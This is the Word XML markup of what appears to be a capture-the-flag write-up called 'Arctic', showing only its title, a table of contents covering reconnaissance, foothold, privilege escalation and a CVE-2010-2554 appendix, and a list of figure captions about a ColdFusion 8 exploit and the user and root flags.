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48A7A7C5" w:rsidR="00060C0E" w:rsidRPr="00CB3015" w:rsidRDefault="00100B03" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arctic</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465157"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1584159B" w14:textId="24D3CF28" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2"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465157" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Index</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_Toc169465157 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="073D984E" w14:textId="4937A731" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465158" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>List of pictures</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_Toc169465158 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61089644" w14:textId="1C0379A9" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465159" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Disclaimer</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_Toc169465159 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="217995CF" w14:textId="72C92D7E" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465160" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Reconnaissance</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_Toc169465160 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5074D747" w14:textId="676EFC31" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465161" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Initial foothold</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_Toc169465161 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D7397A9" w14:textId="1B83A7A8" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465162" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>User flag</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_Toc169465162 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="468DF234" w14:textId="7FBA0A24" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465163" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Privilege escalation</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_Toc169465163 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E919D7D" w14:textId="43F04A36" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465164" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Appendix A - CVE</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_Toc169465164 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4353B421" w14:textId="02029EB9" w:rsidR="00F71FE2" w:rsidRPr="00F71FE2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Sommario2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169465165" w:history="1">
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CVE-2010-2554</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_Toc169465165 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="00F71FE2" w:rsidRPr="00F71FE2">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CFEF614" w14:textId="7D322928"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465158"/>
      <w:r w:rsidRPr="00D265A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>List of pictures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="44B8A653" w14:textId="23FED569" w:rsidR="008224F8" w:rsidRDefault="008224F8">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461191" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">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_Toc169461191 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AD18A34" w14:textId="01BE8D9B" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461192" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 2 - Macromedia ColdFusion MX Server remote acceess</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461192 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53AFD4BE" w14:textId="0B8C1C29" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461193" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 3 - ColdFusion version</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461193 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B814D93" w14:textId="2241F136" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461194" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 4 - Exploit ColdFusion 8</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461194 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A89BDFE" w14:textId="6C6C0734" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461195" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 5 - User flag</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461195 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="214A9EF4" w14:textId="1E1F3D8C" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461196" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 6 - Vulnerability to escalate privileges</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461196 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46C0BCC6" w14:textId="3085E6BC" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461197" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 7 - Privesc</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461197 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B16D25E" w14:textId="1A20DEAE" w:rsidR="008224F8" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461198" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8 - Root flag</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461198 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005347BB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
